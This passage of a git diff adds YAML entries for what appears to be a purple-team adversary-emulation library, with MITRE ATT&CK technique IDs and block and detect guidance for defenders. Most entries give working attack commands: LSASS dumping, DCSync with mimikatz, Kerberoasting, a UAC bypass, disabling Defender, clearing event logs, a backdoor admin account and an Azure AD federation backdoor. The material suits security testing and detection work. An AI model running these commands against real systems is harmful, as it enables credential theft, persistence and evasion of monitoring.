+  - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+  - Use services creation events (Event ID 4697) to identify newly created services. Look specifically for events that are anomalous as compared to other service creation events in the environment, such as events where the command is unique across all other services and events created by principals that do not commonly create services.
+  controls:
+  - SIEM
+  - Endpoint Protection
+  metadata:
+    id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+    tid: T1543.003
+    tactic: TA0003
+    x_vectr_id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+    isv: 1
+- name: Persist via Registry Winlogon Shell
+  description: Run a payload during user login by setting a Registry Winlogon key
+  platforms:
+  - windows
+  guidance:
+  - CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f "{{ command }}"
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+    tid: T1547.004
+    tactic: TA0003
+    x_vectr_id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+    isv: 1
+- name: Persist via new local administrator
+  description: Create a new local user then add them to the "Administrators" group using the builtin net.exe
+  platforms:
+  - windows
+  guidance:
+  - CMD> net user /add {{ username }} {{ password }}
+  - CMD> net localgroup administrators {{ username }} /add
+  block:
+  - Suspicious process execution/behavior blocked by endpoint security tool
+  detect:
+  - Suspicious process execution/behavior detected by endpoint security tool
+  - Use group modification events (Event ID 4728) to identify additions to local security groups.
+  controls:
+  - Endpoint Protection
+  - SIEM
+  metadata:
+    id: 0bcb2080-b140-4a1c-9e79-8512a18882d8
+    tid: T1136.001
+    tactic: TA0003
+    x_vectr_id: 0bcb2080-b140-4a1c-9e79-8512a18882d8
+    isv: 1
+- name: Register a new device in Azure AD
+  description: Register a new device in Azure AD
+  platforms:
+  - azuread
+  guidance:
+  - PS> Join-AADIntDeviceToAurzeAD -DeviceName {{ name }} -DeviceType "purple" -OSVersion "1"
+  block:
+  - 'Prevent users outside of approved groups from being able to register new devices in the tenant. Refer to documentation for details: https://learn.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal#configure-device-settings'
+  detect:
+  - Detect anomalous device registration events by using Azure audit logs
+  controls:
+  - SIEM
+  - Hardening
+  metadata:
+    id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+    tid: T1098.005
+    tactic: TA0003
+    x_tools:
+    - AADInternals
+    x_references:
+    - htpts://aadinternals.nom/post/prt/
+    x_vectr_id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+    isv: 1
+- name: Configure a custom federated domain
+  description: Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant.
+  platforms:
+  - azuread
+  guidance:
+  - PS> ConvertTo-AADIntBackdoor -AccessToken {{ access_token }} -DomainName "{{ domain }}"
+  block:
+  - ''
+  detect:
+  - Monitor for unusual domain federation via the SEIM. Examine AAD logs for actions that "Set domain authentication" to "federated".
+  - https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html
+  controls:
+  - SIEM
+  metadata:
+    id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+    tid: T1484.002
+    tactic: TA0003
+    x_tools:
+    - AADInternals
+    x_references:
+    - https://o365blog.com/post/aadbackdoor/
+    x_vectr_id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+    isv: 1
+metadata:
+  prefix: RHI
+  bundle: Retail and Hospitality Index 2024 v1.0
diff --git a/rh-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml b/rh-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml
new file mode 100644
index 0000000..d274f20
--- /dev/null
+++ b/rh-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml
@@ -0,0 +1,19 @@
+name: Screen Capture
+description: Capture an image of the user's screen
+platforms:
+guidance:
+- "implant> {{ screenshot_command }}\nOR \nshell> {{ screenshot_tool }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+metadata:
+  id: 804512cc-4acf-4be3-a577-ce02ea723fab
+  tid: T1113
+  tactic: TA0009
+  x_tools:
+  - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/screenshot.cs
+  x_vectr_id: 804512cc-4acf-4be3-a577-ce02ea723fab
+  isv: 1
diff --git a/rh-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml b/rh-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml
new file mode 100644
index 0000000..62f850b
--- /dev/null
+++ b/rh-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml
@@ -0,0 +1,20 @@
+name: Keylogger
+description: Log user keystrokes
+platforms:
+- windows
+guidance:
+- "implant> {{ keylog_command }}\nOR \nshell> {{ keylog_tool }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+metadata:
+  id: be524cb1-12e6-4708-ad57-faf91dfad9de
+  tid: T1056.001
+  tactic: TA0009
+  x_tools:
+  - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/keylog.cs
+  x_vectr_id: be524cb1-12e6-4708-ad57-faf91dfad9de
+  isv: 1
diff --git a/rh-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml b/rh-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
new file mode 100644
index 0000000..250d96d
--- /dev/null
+++ b/rh-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
@@ -0,0 +1,20 @@
+name: Access via remote assistance tool
+description: Establish connection to system using a legitimate remote assistance application
+platforms:
+guidance:
+block:
+- Block the installation and use of unapproved third-party utilities via application control software
+- Connections to known remote access service domains/IPs are blocked
+- Remote access connection attempts originating from users outside of the tenant are blocked
+detect:
+- Connections to known remote access service domains/IPs are detected
+controls:
+- Application Control
+- ID/PS
+- Firewall
+metadata:
+  id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+  tid: T1219
+  tactic: TA0011
+  x_vectr_id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+  isv: 1
diff --git a/rh-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml b/rh-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
new file mode 100644
index 0000000..fa200fe
--- /dev/null
+++ b/rh-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
@@ -0,0 +1,18 @@
+name: HTTP C2 over tcp/80
+description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP
+platforms:
+guidance:
+block:
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+  id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+  tid: T1071.001
+  tactic: TA0011
+  x_vectr_id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+  isv: 1
diff --git a/rh-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml b/rh-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
new file mode 100644
index 0000000..075c765
--- /dev/null
+++ b/rh-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
@@ -0,0 +1,18 @@
+name: HTTPS C2 over tcp/443
+description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS
+platforms:
+guidance:
+block:
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+  id: 3ed2f449-744b-48c3-80d2-854386e446a0
+  tid: T1071.001
+  tactic: TA0011
+  x_vectr_id: 3ed2f449-744b-48c3-80d2-854386e446a0
+  isv: 1
diff --git a/rh-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml b/rh-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
new file mode 100644
index 0000000..ac75a59
--- /dev/null
+++ b/rh-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
@@ -0,0 +1,18 @@
+name: Remote tool download over HTTP
+description: Download a tool from a public hosting location onto the victim system
+platforms:
+guidance:
+block:
+- Signatures for known-malicious tools/traffic are blocked by network security controls such as an ID/PS
+detect:
+- Signatures for known-malicious tools/traffic are detected by network security controls such as an ID/PS
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+  id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+  tid: T1105
+  tactic: TA0011
+  x_vectr_id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+  isv: 1
diff --git a/rh-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml b/rh-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
new file mode 100644
index 0000000..12180d9
--- /dev/null
+++ b/rh-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
@@ -0,0 +1,21 @@
+name: Dump LSASS memory using builtin comsvcs.dll
+description: Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk
+platforms:
+- windows
+guidance:
+- shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }}  full
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- SIEM
+- Endpoint Protection
+- Hardening
+metadata:
+  id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+  tid: T1003.001
+  tactic: TA0006
+  x_vectr_id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+  isv: 1
diff --git a/rh-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml b/rh-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
new file mode 100644
index 0000000..821fcc8
--- /dev/null
+++ b/rh-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
@@ -0,0 +1,25 @@
+name: Dump LSASS memory using Sysinternals ProcDump
+description: Use ProcDump from Sysinternals to dump LSASS process memory
+platforms:
+- windows
+guidance:
+- CMD> procdump -ma lsass.exe dump
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+- Block the installation and use of unapproved third-party utilities via application control software
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- SIEM
+- Endpoint Protection
+- Hardening
+- Application Control
+metadata:
+  id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+  tid: T1003.001
+  tactic: TA0006
+  x_tools:
+  - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+  x_vectr_id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+  isv: 1
diff --git a/rh-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml b/rh-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
new file mode 100644
index 0000000..cd0d822
--- /dev/null
+++ b/rh-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
@@ -0,0 +1,20 @@
+name: Extract Logonpasswords via Nanodump
+description: Use nanodump to extract credentials from LSASS process memory
+platforms:
+- windows
+guidance:
+- cmd> nanodump.exe --duplicate -w {{ out_file }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+- Hardening
+metadata:
+  id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+  tid: T1003.001
+  tactic: TA0006
+  x_vectr_id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+  isv: 1
diff --git a/rh-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml b/rh-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
new file mode 100644
index 0000000..e5b69b7
--- /dev/null
+++ b/rh-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
@@ -0,0 +1,22 @@
+name: Extract browser cookies
+description: Extract cookie information from the user's browser
+platforms:
+- windows
+guidance:
+- cmd> SharpChrome.exe cookies
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Suspicious access to database files used by browsers detected using file system telemetry in the SIEM
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 95790889-fb7d-42af-a221-3535e4197cde
+  tid: T1555.003
+  tactic: TA0006
+  x_tools:
+  - https://github.com/GhostPack/SharpDPAPI
+  x_vectr_id: 95790889-fb7d-42af-a221-3535e4197cde
+  isv: 1
diff --git a/rh-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml b/rh-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
new file mode 100644
index 0000000..642834a
--- /dev/null
+++ b/rh-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
@@ -0,0 +1,19 @@
+name: Enabled WDigest via Registry
+description: Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory
+platforms:
+- windows
+guidance:
+- cmd> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+block:
+- Suspicious Registry modification blocked by endpoint security tool
+detect:
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+  tid: T1112
+  tactic: TA0005
+  x_vectr_id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+  isv: 1
diff --git a/rh-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml b/rh-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
new file mode 100644
index 0000000..ff73fb9
--- /dev/null
+++ b/rh-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
@@ -0,0 +1,20 @@
+name: Volumetric Kerberoasting
+description: Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set
+platforms:
+guidance:
+- cmd> Rubeus.exe kerberoast
+block:
+- ''
+detect:
+- 'Configure Advanced Audit for Kerberos operations on domain controllers via Group Policy. Using ticket request logs (Event ID 4769), detect suspicious ticket request operations using one or more of the following strategies: 1) Look for a high volume of ticket requests or unique service principals in a short period of time as compared to the typical number of requests by that source. 2) Configure a honey account with a service principal name set then alert when any ticket is requested for that SPN (this requires first configuring a SACL on the account as well as directory service object access auditing via Advanced Audit). 3) Look for downgraded encryption requests where the requested ticket uses RC4 while the target object uses AES (Note: in cases where the account has a weak password, AES tickets can be cracked in a realistic timeframe so attacks may request AES tickets).'
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+  id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+  tid: T1558.003
+  tactic: TA0006
+  x_tools:
+  - https://github.com/GhostPack/Rubeus
+  x_vectr_id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+  isv: 1
diff --git a/rh-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml b/rh-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
new file mode 100644
index 0000000..76795bc
--- /dev/null
+++ b/rh-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
@@ -0,0 +1,20 @@
+name: Extract domain user credentials via replication
+description: Replicate a user's hash from a domain controller using replication APIs (DCSync).
+platforms:
+- windows
+guidance:
+- (from workstation) mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ user }}
+block:
+- ''
+detect:
+- Enable object logging for directory services via Group Policy Advanced Audit then alert when non-domin controller sources replicate directory objects. Specifically, look for Event ID 4662 events where the action performed was related to replicating object changes (e.g. either/both of "Replicating Directory Changes all" and "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}")
+- https://blog.blacklanternsecurity.com/p/detecting-dcsync
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+  id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+  tid: T1003.006
+  tactic: TA0006
+  x_vectr_id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+  isv: 1
diff --git a/rh-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml b/rh-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
new file mode 100644
index 0000000..8950dd0
--- /dev/null
+++ b/rh-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
@@ -0,0 +1,22 @@
+name: Clear Windows Event Log entries
+description: Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs.
+platforms:
+- windows
+guidance:
+- CMD> wevtutil clear-log Security
+- CMD> wevtutil clear-log Application
+- CMD> wevtutil clear-log System
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102)
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+  tid: T1070.001
+  tactic: TA0005
+  x_vectr_id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+  isv: 1
diff --git a/rh-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml b/rh-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
new file mode 100644
index 0000000..1194713
--- /dev/null
+++ b/rh-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
@@ -0,0 +1,20 @@
+name: Sideload a DLL into a legitimate application
+description: Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application.
+platforms:
+- windows
+guidance:
+- "CMD>\ncopy {{ application }} .\nmove {{ dll }} {{ expected_dll }}\n{{ application }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Using image load telemetry, alert on DLLs stored on-disk at unexpected locations (e.g. a DLL expected to be in System32 being loaded from a temp folder)
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 2496e250-5757-482f-9661-daea872395ae
+  tid: T1574.002
+  tactic: TA0005
+  x_vectr_id: 2496e250-5757-482f-9661-daea872395ae
+  isv: 1
diff --git a/rh-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml b/rh-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml
new file mode 100644
index 0000000..bc14660
--- /dev/null
+++ b/rh-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml
@@ -0,0 +1,22 @@
+name: Load known-abusable kernel driver
+description: Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes.
+platforms:
+- windows
+guidance:
+- "(example) cmd> \nsc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\\windows\\System32\\Drivers\\{{ sys_file }} displayname= {{ name }}\nsc.exe start {{ name }}\n"
+block:
+- Use built-in Windows security features like HVCI and WDAC to block loading of drivers based on hash and/or signature characteristics.
+- https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
+- https://www.loldrivers.io/
+- Anomalous driver load blocked by endpoint security tool
+detect:
+- Anomalous driver load detected by endpoint security tool or in the SIEM via telemetry data, such as Sysmon ID 6
+controls:
+- Hardening
+- Endpoint Protection
+metadata:
+  id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+  tid: T1014
+  tactic: TA0005
+  x_vectr_id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+  isv: 1
diff --git a/rh-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml b/rh-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
new file mode 100644
index 0000000..77a3868
--- /dev/null
+++ b/rh-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
@@ -0,0 +1,25 @@
+name: Bypass User Account Control (UAC) via fodhelper
+description: Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification
+platforms:
+- windows
+guidance:
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+- cmd> c:\windows\system32\fodhelper.exe
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Windows Registry access/modifications detected in the SIEM using telemetry (e.g. Windows Advanced Audit events, endpoint security tool logs)
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+  id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+  tid: T1548.002
+  tactic: TA0004
+  x_references:
+  - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+  x_vectr_id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+  isv: 1
diff --git a/rh-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml b/rh-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
new file mode 100644
index 0000000..9574d4f
--- /dev/null
+++ b/rh-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
@@ -0,0 +1,20 @@
+name: DLL execution using Rundll32
+description: Execute a malicious DLL's function directly using rundll32
+platforms:
+- windows
+guidance:
+- cmd> rundll32 {{ dll }},{{ export }} [{{ args }}]
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Payload on disk deleted/quarantined by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 940be4b6-6081-4808-ab64-aceadfeb3792
+  tid: T1218.011
+  tactic: TA0005
+  x_vectr_id: 940be4b6-6081-4808-ab64-aceadfeb3792
+  isv: 1
diff --git a/rh-index-2024/techniques/DefenseEvasion/9dbfedcf-893f-4086-b428-2f3bc73c96a5.yml b/rh-index-2024/techniques/DefenseEvasion/9dbfedcf-893f-4086-b428-2f3bc73c96a5.yml
new file mode 100644
index 0000000..0bd0c38
--- /dev/null
+++ b/rh-index-2024/techniques/DefenseEvasion/9dbfedcf-893f-4086-b428-2f3bc73c96a5.yml
@@ -0,0 +1,20 @@
+name: Certutil decode Base64 encoded payload
+description: Use certutil.exe to decode an encoded payload file
+platforms:
+- windows
+guidance:
+- cmd> certutil -decode {{ infile_name }} {{ outfile_name }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 9dbfedcf-893f-4086-b428-2f3bc73c96a5
+  tid: T1140
+  tactic: TA0005
+  x_vectr_id: 9dbfedcf-893f-4086-b428-2f3bc73c96a5
+  isv: 1
diff --git a/rh-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml b/rh-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
new file mode 100644
index 0000000..66ceb94
--- /dev/null
+++ b/rh-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
@@ -0,0 +1,20 @@
+name: Disable Windows Defender via PowerShell
+description: Use PowerShell's Set-MpPreference to disable Windows Defender
+platforms:
+- windows
+guidance:
+- PS> Set-MpPreference -DisableBehaviorMonitoring $true
+- PS> Set-MpPreference -DisableRealtimeMonitoring $true
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- "Changes to Defender's running state are detected using Defender Event Log events (e.g. 5001 for being disabled, 5004 and 5007 for being changed; full list: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus)"
+controls:
+- Endpoint Protection
+metadata:
+  id: cb3ea139-979c-438a-9cf7-611b985f4d61
+  tid: T1562.001
+  tactic: TA0005
+  x_vectr_id: cb3ea139-979c-438a-9cf7-611b985f4d61
+  isv: 1
diff --git a/rh-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml b/rh-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
new file mode 100644
index 0000000..df9cb79
--- /dev/null
+++ b/rh-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
@@ -0,0 +1,16 @@
+name: Modify identity policy in IdP
+description: Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Monitor for policy modifications from IdP control plane telemetry and look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+controls:
+- SIEM
+metadata:
+  id: cbd9070f-03fa-455f-af46-99e8d41146ac
+  tid: T1484
+  tactic: TA0003
+  x_vectr_id: cbd9070f-03fa-455f-af46-99e8d41146ac
+  isv: 1
diff --git a/rh-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml b/rh-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml
new file mode 100644
index 0000000..dbf086a
--- /dev/null
+++ b/rh-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml
@@ -0,0 +1,24 @@
+name: Internal network scan using Net Scan
+description: Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect
+platforms:
+- windows
+guidance:
+- cmd> {{ netscan_binary }}
+block:
+- Network security controls block source generating a large volume of connection requests
+- Block the installation and use of unapproved third-party utilities via application control software
+detect:
+- Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs
+controls:
+- ID/PS
+- Firewall
+- SIEM
+- Application Control
+metadata:
+  id: 3f120c23-78c0-462f-808f-38ef4f607233
+  tid: T1046
+  tactic: TA0007
+  x_tools:
+  - https://www.softperfect.com/products/networkscanner/
+  x_vectr_id: 3f120c23-78c0-462f-808f-38ef4f607233
+  isv: 1
diff --git a/rh-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml b/rh-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml
new file mode 100644
index 0000000..751b34b
--- /dev/null
+++ b/rh-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml
@@ -0,0 +1,20 @@
+name: Domain trust discovery via nltest
+description: Identify domain trust relationships using nltest.exe
+platforms:
+- windows
+guidance:
+- cmd> nltest.exe /domain_trusts /all_trusts
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+  tid: T1482
+  tactic: TA0007
